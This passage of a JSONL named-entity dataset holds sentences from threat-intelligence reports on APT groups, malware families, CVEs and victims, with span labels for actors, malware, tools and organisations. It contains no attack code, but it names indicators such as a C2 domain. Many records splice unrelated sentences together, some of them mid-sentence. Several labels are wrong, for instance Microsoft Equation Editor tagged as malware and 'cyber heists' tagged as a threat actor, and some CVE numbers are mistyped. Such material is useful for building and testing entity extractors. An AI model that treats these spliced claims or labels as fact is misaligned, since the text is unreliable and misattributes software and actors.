"ORGANIZATION: specific individuals": [[513, 533]], "ORGANIZATION: institutions": [[538, 550]], "ORGANIZATION: military": [[569, 577]], "ORGANIZATION: intelligence agencies": [[594, 615]], "ORGANIZATION: government": [[628, 638]]}, "info": {"id": "cyberner_stix_train_005655", "source": "cyberner_stix_train"}}
{"text": "While WERDLOD and OSX_DOK.C use different codes ( since they target different operating systems ) , they have similar proxy settings and script formats .", "spans": {"MALWARE: WERDLOD": [[6, 13]], "MALWARE: OSX_DOK.C": [[18, 27]]}, "info": {"id": "cyberner_stix_train_005656", "source": "cyberner_stix_train"}}
{"text": "We have chosen to join forces to continue the investigation around Gooligan . Further , the recent DOJ complaint provides insight into initial compromise techniques conducted by North Korean operators against APT38 targets , which may have been leveraged as part of the initial compromise into the targeted organizations . referred to as maturity levels . The threat actor then used the built - in certutil utility to Base64 encode the segments .", "spans": {"MALWARE: Gooligan": [[67, 75]], "THREAT_ACTOR: operators": [[191, 200]], "THREAT_ACTOR: APT38": [[209, 214]], "TOOL: built - in certutil utility": [[387, 414]]}, "info": {"id": "cyberner_stix_train_005657", "source": "cyberner_stix_train"}}
{"text": "] netsybil-parks [ . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran . For example , “ hugesoft.org ” is an FQDN but also represents a zone . Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"ORGANIZATION: civil society": [[162, 175]], "DOMAIN: hugesoft.org": [[289, 301]], "TOOL: FQDN": [[310, 314]]}, "info": {"id": "cyberner_stix_train_005658", "source": "cyberner_stix_train"}}
{"text": "APT28 : AT THE CENTER OF THE STORM .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_005659", "source": "cyberner_stix_train"}}
{"text": "In fact , they were extremely open and verbose about their functionality - for example , early samples contained a plethora of logging messages in unencrypted form .", "spans": {}, "info": {"id": "cyberner_stix_train_005660", "source": "cyberner_stix_train"}}
{"text": "WildFire properly classifies these Downeks and Quasar samples as malicious .", "spans": {"TOOL: WildFire": [[0, 8]], "MALWARE: Downeks": [[35, 42]], "MALWARE: Quasar": [[47, 53]]}, "info": {"id": "cyberner_stix_train_005662", "source": "cyberner_stix_train"}}
{"text": "The com.dsufabunfzs.dowiflubs strings in the screenshot above refer to the internal name this particular malware was given , which in this case was randomized into alphabet salad . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists . ANEL ( also referred to as UpperCut ) an internal user may have fallen prey to a spear phishing attack ,", "spans": {"THREAT_ACTOR: APT38": [[181, 186]], "THREAT_ACTOR: regime-backed group": [[227, 246]], "ORGANIZATION: financial institutions": [[302, 324]], "THREAT_ACTOR: cyber heists": [[367, 379]], "MALWARE: ANEL": [[382, 386]], "MALWARE: UpperCut": [[409, 417]], "ORGANIZATION: an internal user": [[420, 436]]}, "info": {"id": "cyberner_stix_train_005663", "source": "cyberner_stix_train"}}
{"text": "This campaign is named after a rare backdoor used by the MoleRATs Group , dubbed Spark by Cybereason and previously reported by 360 ’s blog .", "spans": {"THREAT_ACTOR: MoleRATs": [[57, 65]], "MALWARE: Spark": [[81, 86]], "ORGANIZATION: Cybereason": [[90, 100]], "ORGANIZATION: 360": [[128, 131]]}, "info": {"id": "cyberner_stix_train_005665", "source": "cyberner_stix_train"}}
{"text": "The activity class “ org.starsizew.MainActivity ” executes when the app is started . In December 2015 , Symantec published a post about \" two Iran-based attack groups that appear to be connected , Cadelle and Chafer \" that \" have been using Backdoor.Cadelspy and Backdoor.Remexi to spy on Iranian individuals and Middle Eastern organizations \" . Finally the macros are executed using the Office engine . If the main function is called with only , it will take the path that is intended for connect to the MSSQL server and , upload • None are supplied to the main function , it will immediately fail due to attempting to utilize command line arguments that were not parsed yet .", "spans": {"ORGANIZATION: Symantec": [[104, 112]], "THREAT_ACTOR: attack groups": [[153, 166]], "THREAT_ACTOR: Cadelle": [[197, 204]], "THREAT_ACTOR: Chafer": [[209, 215]], "TOOL: Backdoor.Cadelspy": [[241, 258]], "TOOL: Backdoor.Remexi": [[263, 278]], "TOOL: macros": [[358, 364]], "TOOL: Office": [[388, 393]]}, "info": {"id": "cyberner_stix_train_005666", "source": "cyberner_stix_train"}}
{"text": "Broadcast Receivers are Android components that can register themselves for particular events . In the former Soviet Union , Silence targeted banks in Kyrgyzstan , Kazakhstan , and Ukraine . At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" .", "spans": {"SYSTEM: Android": [[24, 31]], "THREAT_ACTOR: Silence": [[125, 132]], "ORGANIZATION: banks": [[142, 147]], "THREAT_ACTOR: Turk Black Hat": [[276, 290]]}, "info": {"id": "cyberner_stix_train_005667", "source": "cyberner_stix_train"}}
{"text": "It is interesting that the attackers used Java Base64 library developed by Sauron Software . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package .", "spans": {"ORGANIZATION: Sauron Software": [[75, 90]], "VULNERABILITY: Microsoft Office vulnerability": [[141, 171]], "VULNERABILITY: CVE-2017-11882": [[174, 188]], "THREAT_ACTOR: NEODYMIUM": [[193, 202]], "SYSTEM: Windows": [[231, 238]], "MALWARE: Wingbird": [[251, 259]], "ORGANIZATION: FinFisher": [[298, 307]]}, "info": {"id": "cyberner_stix_train_005668", "source": "cyberner_stix_train"}}
{"text": "XLoader can also start other attacker-specified packages . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed – most likely detections were related to students’ and researchers’ scanning known collected samples and any incidents” remain unconfirmed and unknown . It contains information like : Server address and port the client will connect to ; The password chosen by the attacker for the remote access ; The ID associated to the victim client .", "spans": {"MALWARE: XLoader": [[0, 7]], "THREAT_ACTOR: groups'": [[152, 159]], "ORGANIZATION: Chinese universities": [[172, 192]]}, "info": {"id": "cyberner_stix_train_005669", "source": "cyberner_stix_train"}}
{"text": "At the time of writing Lookout has observed two updates to the Dardesh application , the first on February 26 and the second on March 28 . However , from this it 's only clear that Lazarus might have attacked Polish banks . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"ORGANIZATION: Lookout": [[23, 30]], "MALWARE: Dardesh": [[63, 70]], "THREAT_ACTOR: Lazarus": [[181, 188]], "ORGANIZATION: banks": [[216, 221]], "THREAT_ACTOR: Elfin": [[228, 233]], "THREAT_ACTOR: APT33": [[256, 261]], "ORGANIZATION: CrowdStrike Services": [[464, 484]], "THREAT_ACTOR: Play ransomware intrusions": [[513, 539]], "TOOL: Microsoft Exchange": [[590, 608]]}, "info": {"id": "cyberner_stix_train_005670", "source": "cyberner_stix_train"}}
{"text": "Other research have also connected the OSX malware and Retefe ( the external term used for WERDLOD ) via similarities in their behavior .", "spans": {"SYSTEM: OSX": [[39, 42]], "MALWARE: WERDLOD": [[91, 98]]}, "info": {"id": "cyberner_stix_train_005671", "source": "cyberner_stix_train"}}
{"text": "FANCY BEAR has also been linked publicly to intrusions into the German Bundestag and France ’s TV5 Monde TV station in April 2015 .", "spans": {"THREAT_ACTOR: FANCY BEAR": [[0, 10]], "ORGANIZATION: Bundestag": [[71, 80]], "ORGANIZATION: TV5 Monde": [[95, 104]]}, "info": {"id": "cyberner_stix_train_005672", "source": "cyberner_stix_train"}}
{"text": "Actors will run HTRAN on a server and configure their malware to interact with that server ; however , the actor will configure HTRAN to forward traffic to another server where the actual C2 server exists . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"THREAT_ACTOR: Actors": [[0, 6]], "TOOL: HTRAN": [[16, 21], [128, 133]], "THREAT_ACTOR: actor": [[107, 112]], "MALWARE: PIVY": [[207, 211], [473, 477]], "ORGANIZATION: chemical makers": [[285, 300]], "ORGANIZATION: government agencies": [[303, 322]], "ORGANIZATION: defense contractors": [[325, 344]], "THREAT_ACTOR: attackers": [[415, 424]], "VULNERABILITY: zero-day": [[432, 440]]}, "info": {"id": "cyberner_stix_train_005673", "source": "cyberner_stix_train"}}
{"text": "Xiaomi , a privately owned Chinese electronics and software company , is the 5th largest smart phone manufacturer in the world and also manufactures IoT devices for the home . APT41 has also used credentials compromised in previous operations . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others .", "spans": {"ORGANIZATION: Xiaomi": [[0, 6]], "THREAT_ACTOR: APT41": [[176, 181]], "THREAT_ACTOR: Sofacy group": [[259, 271]], "MALWARE: CORESHELL": [[342, 351]], "MALWARE: SPLM": [[354, 358]], "MALWARE: JHUHUGIT": [[361, 369]], "MALWARE: AZZY": [[372, 376]]}, "info": {"id": "cyberner_stix_train_005674", "source": "cyberner_stix_train"}}
{"text": "Germany is one of the first attack turfs TrickBot spread to when it first emerged in 2016 . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . All three waves involved a single spear phishing email that appeared to originate from a government agency based in the Middle East .", "spans": {"MALWARE: TrickBot": [[41, 49]], "VULNERABILITY: CVE-2017-1182": [[179, 192]], "MALWARE: Microsoft Equation Editor": [[210, 235]], "MALWARE: EQNEDT32.exe": [[238, 250]], "ORGANIZATION: government agency": [[391, 408]]}, "info": {"id": "cyberner_stix_train_005675", "source": "cyberner_stix_train"}}
{"text": "] it/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e , possibly en masse . menuPass has targeted individuals and organizations in Japan since at least 2014 , and as the same organizations and academics were largely targeted each month in these attacks , it further shows menuPass is persistent in attempts to compromise their targets .", "spans": {"MALWARE: BalkanRAT": [[52, 61]], "MALWARE: BalkanDoor": [[172, 182]]}, "info": {"id": "cyberner_stix_train_005676", "source": "cyberner_stix_train"}}
{"text": "At this stage , we have two similar , parallel constructions of events – the how behind the immediate deployment and execution of TRITON / TRISIS – yet dramatically different responses in terms of attribution and labeling .", "spans": {"MALWARE: TRITON": [[130, 136]], "MALWARE: TRISIS": [[139, 145]]}, "info": {"id": "cyberner_stix_train_005677", "source": "cyberner_stix_train"}}
{"text": "After that , stage 2 payloads are still retrieved as Bitmap ( BMP ) images that use Least Significant Bit ( LSB ) Steganography to hide the real payloads .", "spans": {"TOOL: Bitmap": [[53, 59]], "TOOL: BMP": [[62, 65]], "TOOL: images": [[68, 74]], "TOOL: Least Significant Bit": [[84, 105]], "TOOL: LSB": [[108, 111]], "TOOL: Steganography": [[114, 127]]}, "info": {"id": "cyberner_stix_train_005678", "source": "cyberner_stix_train"}}
{"text": "ESET detects this adware , collectively , as Android/AdDisplay.Ashas . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . The malware configuration contains one Command and Control: pactchfilepacks.net23.net .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: Android/AdDisplay.Ashas": [[45, 68]], "ORGANIZATION: Kaspersky": [[84, 93]], "THREAT_ACTOR: PROJECTM": [[157, 165]], "THREAT_ACTOR: MYTHIC LEOPARD": [[170, 184]], "ORGANIZATION: military": [[283, 291]], "DOMAIN: pactchfilepacks.net23.net": [[362, 387]]}, "info": {"id": "cyberner_stix_train_005679", "source": "cyberner_stix_train"}}
{"text": "It is impossible to deprive it of these rights without the use of specialized tools ( such as Kaspersky Internet Security for Android ) . Once a victim is confirmed as \" interesting \" , the attackers upload another Epic backdoor which has a unique ID used to control this specific victim . Local user account creation tools . /Library / Ruby / Gems/2.6.0 / extensions / init.rb Ruby script 53789519 /usr / local / bin / com.docker.vmnat FULLHOUSE.DOORED 53789522 /usr / local / bin / com.docker.vmnat.lock Not recovered 54101444 /Library / Fonts / ArialUnicode.ttf.md5 STRATOFEAR ( Config ) 54102142", "spans": {"SYSTEM: Kaspersky Internet Security": [[94, 121]], "SYSTEM: Android": [[126, 133]], "TOOL: Epic backdoor": [[215, 228]], "TOOL: Local user account creation tools": [[290, 323]]}, "info": {"id": "cyberner_stix_train_005680", "source": "cyberner_stix_train"}}
{"text": "Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . The malware will begin to download other utilities .", "spans": {"MALWARE: Pony DLL": [[89, 97]], "MALWARE: Vawtrak": [[102, 109]], "TOOL: utilities": [[240, 249]]}, "info": {"id": "cyberner_stix_train_005681", "source": "cyberner_stix_train"}}
{"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco .", "spans": {"THREAT_ACTOR: Patchwork": [[10, 19]], "MALWARE: MS PowerPoint document": [[28, 50]], "VULNERABILITY: CVE-2014-6352": [[76, 89]], "MALWARE: KeyBoy": [[156, 162]], "ORGANIZATION: Cisco": [[186, 191]]}, "info": {"id": "cyberner_stix_train_005682", "source": "cyberner_stix_train"}}
{"text": "In this case , explorer.exe will instance the MMDeviceEnumerator class and will execute the payload .", "spans": {"FILEPATH: explorer.exe": [[15, 27]]}, "info": {"id": "cyberner_stix_train_005683", "source": "cyberner_stix_train"}}
{"text": "Logcat logs show FakeSpy uses libmsy.so to execute the malicious packed mycode.jar file . We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda . Several additional documents surfaced between January 17 and February 3 .", "spans": {"MALWARE: FakeSpy": [[17, 24]], "THREAT_ACTOR: actors": [[111, 117]], "TOOL: HyperBro": [[153, 161]], "THREAT_ACTOR: Emissary Panda": [[196, 210]]}, "info": {"id": "cyberner_stix_train_005684", "source": "cyberner_stix_train"}}
{"text": "] ponethus [ . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups . And a new version of Ixeshe , which has been in service since 2009 to attack targets in East Asia , uses new network traffic patterns , possibly to evade traditional network security systems . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": {"MALWARE: document malware": [[41, 57]], "ORGANIZATION: Tibetan non-governmental organizations": [[77, 115]], "ORGANIZATION: Falun Gong": [[144, 154]], "ORGANIZATION: Uyghur groups": [[159, 172]], "MALWARE: Ixeshe": [[196, 202]]}, "info": {"id": "cyberner_stix_train_005685", "source": "cyberner_stix_train"}}
{"text": "Scxreexcv4 Capture an image micmokmi8x Capture audio Yufsssp Get latitude and longitude GExCaalsss7 Get call logs PHOCAs7 Call phone numbers sent by the C & C server Gxextsxms Get a list of inbox SMS messages Msppossag Send SMS with message body sent by the C & C server Getconstactx Get a list of all contacts Rinxgosa Play a ringtone bithsssp64 Execute commands sent by the C & C server DOWdeletx Deletes When used against 32-bit targets , Bemstour still delivered the same DoublePulsar backdoor . While there is some overlap between IP addresses used by Scarlet Mimic E-APT and Putter Panda , it has not been concluded that the groups are the same .", "spans": {"TOOL: Bemstour": [[442, 450]], "TOOL: DoublePulsar backdoor": [[476, 497]], "THREAT_ACTOR: by Scarlet": [[554, 564]], "THREAT_ACTOR: Mimic E-APT and Putter Panda": [[565, 593]]}, "info": {"id": "cyberner_stix_train_005686", "source": "cyberner_stix_train"}}
{"text": "In this case , we had observed a strange pattern emerging from the Sofacy group over the past year within their command and control infrastructure .", "spans": {"THREAT_ACTOR: Sofacy": [[67, 73]], "TOOL: command and control": [[112, 131]]}, "info": {"id": "cyberner_stix_train_005687", "source": "cyberner_stix_train"}}
{"text": "Saudi Arabia released a warning to local organizations about the Shamoon malware , alerting about potential attacks and advising organizations to prepare .", "spans": {"MALWARE: Shamoon": [[65, 72]]}, "info": {"id": "cyberner_stix_train_005688", "source": "cyberner_stix_train"}}
{"text": "The threat actors seem to have abandoned these URLs and might be looking into other ways to reach more victims . We have been presented with a rare opportunity to see some development activities from the actors associated with the OilRig attack campaign , a campaign Unit 42 has been following since May 2016 . Brief Description : SFX Archive Second Stage . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": {"THREAT_ACTOR: actors": [[204, 210]], "ORGANIZATION: Unit 42": [[267, 274]], "TOOL: SFX Archive": [[331, 342]], "THREAT_ACTOR: Monti": [[392, 397]], "SYSTEM: Linux platform": [[413, 427]]}, "info": {"id": "cyberner_stix_train_005689", "source": "cyberner_stix_train"}}
{"text": "As an initial attack vector , “ Agent Smith ” abuses the 9Apps market – with over 360 different dropper variants . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted . Dexphot exhibits multiple layers of polymorphism across the binaries it distributes . Beginning in January 2021 , Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer ’s environment .", "spans": {"MALWARE: Agent Smith": [[32, 43]], "SYSTEM: 9Apps": [[57, 62]], "ORGANIZATION: Arab Emirates": [[201, 214]], "MALWARE: Dexphot": [[335, 342]], "ORGANIZATION: Mandiant Managed Defense": [[449, 473]]}, "info": {"id": "cyberner_stix_train_005690", "source": "cyberner_stix_train"}}
{"text": "Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid . During a recent campaign , APT32 leveraged social engineering emails with Microsoft ActiveMime file attachments to deliver malicious macros . This white paper describes the steganography algorithm used in two distinct loader variants and looks at the launcher of the backdoor that was encoded in one of the .png cover images . mcvsocfg.dll : In April , Talos discovered a new ransomware actor , RA Group , conducting double extortion attacks using their ransomware variant based on leaked Babuk source code .", "spans": {"MALWARE: FinFisher": [[264, 273]], "THREAT_ACTOR: APT32": [[325, 330]], "MALWARE: Microsoft ActiveMime file": [[372, 397]], "FILEPATH: mcvsocfg.dll": [[625, 637]], "ORGANIZATION: Talos": [[651, 656]], "THREAT_ACTOR: RA Group": [[693, 701]], "MALWARE: Babuk source code": [[787, 804]]}, "info": {"id": "cyberner_stix_train_005691", "source": "cyberner_stix_train"}}
{"text": "Trojan.Sofacy Backdoor.SofacyX Infostealer.Sofacy OSX.Sofacy Trojan.Shunnael Trojan.Lojax .", "spans": {"MALWARE: Trojan.Sofacy": [[0, 13]], "MALWARE: Backdoor.SofacyX": [[14, 30]], "MALWARE: Infostealer.Sofacy": [[31, 49]], "MALWARE: OSX.Sofacy": [[50, 60]], "MALWARE: Trojan.Shunnael": [[61, 76]], "MALWARE: Trojan.Lojax": [[77, 89]]}, "info": {"id": "cyberner_stix_train_005692", "source": "cyberner_stix_train"}}
{"text": "Detailed Malware Structure Malware Strucutre com.mile.brain ( SHA256 : 135d6acff3ca27e6e7997429e5f8051f88215d12351e4103f8344cd66611e0f3 ) : This is the main application found on Google Play . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper .", "spans": {"SYSTEM: Google Play": [[178, 189]], "VULNERABILITY: Heartbleed vulnerability": [[223, 247]], "ORGANIZATION: PwC UK": [[293, 299]], "ORGANIZATION: BAE Systems": [[304, 315]], "ORGANIZATION: industry": [[339, 347]], "ORGANIZATION: government": [[352, 362]]}, "info": {"id": "cyberner_stix_train_005693", "source": "cyberner_stix_train"}}
{"text": "Their research showcased a set of downloaders and domains that could potentially lead to a more extensive malware distribution campaign .", "spans": {}, "info": {"id": "cyberner_stix_train_005694", "source": "cyberner_stix_train"}}
{"text": "The indictment was for conducting \" active cyber operations with the intent of interfering in the 2016 presidential election . \" The espionage operation was run by Unit 26165 , commanded by GRU Officer Viktor Borisovich Netykshko .", "spans": {"THREAT_ACTOR: Unit 26165": [[164, 174]], "ORGANIZATION: GRU": [[190, 193]]}, "info": {"id": "cyberner_stix_train_005695", "source": "cyberner_stix_train"}}
{"text": "] 251 2d108ff3a735dea1d1fdfa430f37fab2 com.psiphon3 dexlib 2.x 188.165.49 [ . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . The downloaded payload is an image file , but it contains an appended malicious payload to be decrypted .", "spans": {"MALWARE: sample": [[94, 100]]}, "info": {"id": "cyberner_stix_train_005696", "source": "cyberner_stix_train"}}
{"text": "A remarkable fact is that all the targeted apps relate to Spanish banks , including targets never seen before in any other Android banking Trojan . On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) . Symantec was first to publicly report on Tick , followed by LAC in 2016 .", "spans": {"SYSTEM: Android": [[123, 130]], "THREAT_ACTOR: APT10": [[209, 214]], "ORGANIZATION: Symantec": [[375, 383]], "THREAT_ACTOR: Tick": [[416, 420]], "ORGANIZATION: LAC": [[435, 438]]}, "info": {"id": "cyberner_stix_train_005697", "source": "cyberner_stix_train"}}
{"text": "Even the C & C server side was mostly exposed with the file listing available for everyone to traverse through it . In 2015 and 2016 , two Vietnamese media outlets were targeted with malware that FireEye assesses to be unique to APT32 . The image below highlights the nodes associated with the samples analyzed in this report . The group , which has some loose ties and similarities to other Iranian APTs like APT34 and Charming Kitten , first came to light in 2019 .", "spans": {"ORGANIZATION: media": [[150, 155]], "ORGANIZATION: FireEye": [[196, 203]], "THREAT_ACTOR: APT32": [[229, 234]], "THREAT_ACTOR: group": [[332, 337]], "THREAT_ACTOR: Iranian APTs": [[392, 404]], "THREAT_ACTOR: APT34": [[410, 415]], "THREAT_ACTOR: Charming Kitten": [[420, 435]]}, "info": {"id": "cyberner_stix_train_005698", "source": "cyberner_stix_train"}}
{"text": "The ShadowBrokers' latest dump of Equation Group hacks focuses on UNIX systems and GSM networks , and was accompanied by an open letter to President Trump . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": {"ORGANIZATION: Unit 42": [[157, 164]], "ORGANIZATION: Foreign Ministry": [[241, 257]]}, "info": {"id": "cyberner_stix_train_005699", "source": "cyberner_stix_train"}}
{"text": "It appears that the attackers may have impersonated the identity of a real young woman and stole her pictures to construct the fake profile , along with a professional biography also stolen from yet another person . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard .", "spans": {"THREAT_ACTOR: attackers": [[20, 29]], "FILEPATH: the decoy PDF": [[232, 245]], "ORGANIZATION: Coast Guard": [[290, 301]]}, "info": {"id": "cyberner_stix_train_005700", "source": "cyberner_stix_train"}}
{"text": "EventBot uses this function to update its C2s , the configuration of webinjects , etc . Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant . In a recent attack , APT33 sent spear-phishing emails to workers in the aviation industry .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: Honeycomb": [[88, 97]], "THREAT_ACTOR: APT33": [[338, 343]], "TOOL: emails": [[364, 370]], "ORGANIZATION: aviation industry": [[389, 406]]}, "info": {"id": "cyberner_stix_train_005701", "source": "cyberner_stix_train"}}
{"text": ", IMSI , operator code , country , MCC-mobile country , SIM serial , operator name , and mobile number ) Upload wifi information ( e.g. , SSID , wifi speed , and MAC address ) Upload other information ( e.g. , display , date , time , fingerprint , created at , and updated at ) The app is capable of stealing messages from popular messaging apps by abusing the notification permissions to read the notification content and saving it to the database . The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government . the CFG ( specifically mblock_t : :p redset and mblock_t : :s uccset ) An issue was discovered in the Calendar feature in Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 ( update 1 ) , as exploited in the wild starting in December 2021 .", "spans": {"THREAT_ACTOR: threat group": [[455, 467]], "ORGANIZATION: government": [[598, 608]], "TOOL: mblock_t : :p redset": [[634, 654]], "TOOL: mblock_t : :s uccset": [[659, 679]], "VULNERABILITY: issue was discovered in the Calendar feature": [[685, 729]], "TOOL: Zimbra Collaboration Suite 8.8.x": [[733, 765]]}, "info": {"id": "cyberner_stix_train_005702", "source": "cyberner_stix_train"}}
{"text": "This could be very dangerous and cause some devices to crash following the overwrite . The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party . While paying for your reservation or checking out at a hotel , it ’s a good idea to use a virtual wallet such as Apple Pay , Google Pay , etc . To compromise the victims , the attackers used extremely effective social engineering techniques which involved sending malicious PDF documents to their targets .", "spans": {"ORGANIZATION: government agencies": [[192, 211]], "ORGANIZATION: Fatah political party": [[220, 241]], "TOOL: Apple Pay": [[357, 366]], "TOOL: Google Pay": [[369, 379]], "THREAT_ACTOR: extremely effective social engineering techniques": [[435, 484]]}, "info": {"id": "cyberner_stix_train_005703", "source": "cyberner_stix_train"}}
{"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": {"MALWARE: RTF": [[5, 8]], "VULNERABILITY: CVE-2017_1882": [[28, 41]], "MALWARE: eqnedt32.exe": [[45, 57]], "TOOL: RTF": [[65, 68]], "VULNERABILITY: CVE-2017-1882": [[88, 101]], "FILEPATH: eqnedt32.exe": [[105, 117]]}, "info": {"id": "cyberner_stix_train_005704", "source": "cyberner_stix_train"}}
{"text": "Step 3 : Run installation Start the Bank Austria security app from the notifications or your download folder , tap Install . Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers . The group has targeted victims primarily in South Korea , but also in Japan , Vietnam , Russia , Nepal , China , India , Romania , Kuwait , and other parts of the Middle East .", "spans": {"SYSTEM: Bank Austria security app": [[36, 61]], "THREAT_ACTOR: they": [[164, 168]], "TOOL: actor-controlled": [[235, 251]], "TOOL: servers": [[252, 259]]}, "info": {"id": "cyberner_stix_train_005705", "source": "cyberner_stix_train"}}
{"text": "After the Anubis actor was allegedly arrested and the source code was leaked there was also huge increase in the number of Anubis samples found in the wild , but the new actors using Anubis have no support or updates . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East .", "spans": {"MALWARE: Anubis": [[10, 16], [123, 129], [183, 189]], "THREAT_ACTOR: Machete": [[219, 226]], "THREAT_ACTOR: APT39": [[347, 352]]}, "info": {"id": "cyberner_stix_train_005706", "source": "cyberner_stix_train"}}
{"text": "TG-3390 has access to proprietary tools , some of which are used exclusively by TG-3390 and others that are shared among a few Chinese threat groups .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7], [80, 87]]}, "info": {"id": "cyberner_stix_train_005707", "source": "cyberner_stix_train"}}
{"text": "The iOS and Android apps for Netflix are enormously popular , effectively turning a mobile device into a television with which users can stream full movies and TV programs anytime , anywhere . Since the report’s release in September 2018 , Group-IB’s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"SYSTEM: iOS": [[4, 7]], "SYSTEM: Android": [[12, 19]], "ORGANIZATION: Netflix": [[29, 36]], "ORGANIZATION: Group-IB’s": [[240, 250]], "ORGANIZATION: banks": [[312, 317]], "THREAT_ACTOR: Silence": [[330, 337]], "ORGANIZATION: consumer": [[417, 425]], "MALWARE: Carberp": [[517, 524]]}, "info": {"id": "cyberner_stix_train_005708", "source": "cyberner_stix_train"}}
{"text": "Specifically , the following facts support this assessment: The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": {"THREAT_ACTOR: attacker": [[64, 72]], "FILEPATH: IOC files": [[188, 197]], "THREAT_ACTOR: HIDDEN COBRA": [[206, 218]], "MALWARE: FALLCHILL": [[241, 250]]}, "info": {"id": "cyberner_stix_train_005709", "source": "cyberner_stix_train"}}
{"text": "ESET researchers will continue monitoring new Turla activities and will publish relevant information on our blog . From the time of file creation , the attacker started working at least as early as July 2018 . The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky’s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features . For example , Donot and Bitter disguised as Kashmiri Voice to attack Pakistan , Transparent Tribe attacked India with decoy document regarding terrorist attacks in Kashmir . Considering APT-C-09 , Bitter and Donot have carried out targeted attacks against China , we must take actions in advance and keep a close eye on their recent activities . APT41 espionage operations against the healthcare , high-tech , and telecommunications sectors include establishing and maintaining strategic access , and through mid-2015 , the theft of intellectual property . FireEye Threat Intelligence assesses with high confidence that APT41 carries out an array of financially motivated intrusions , particularly against the video game industry , including stealing source code and digital certificates , virtual currency manipulation , and attempting to deploy ransomware . APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage operations in what appears to be activity that falls outside the scope of state-sponsored missions . Based on early observed activity , consistent behavior , and APT41's unusual focus on the video game industry , we believe the group's cyber crime activities are most likely motivated by personal financial gain or hobbyist interests . APT41 campaigns include most of the incidents previously attributed in FireEye Threat Intelligence reporting to GREF Team and a number of additional clusters that were previously unnamed . Activity traces back to 2012 when individual members of APT41 conducted primarily financially motivated operations focused on the video game industry before expanding into likely statesponsored activity . Learning to access video game production environments enabled APT41 to develop the tactics , 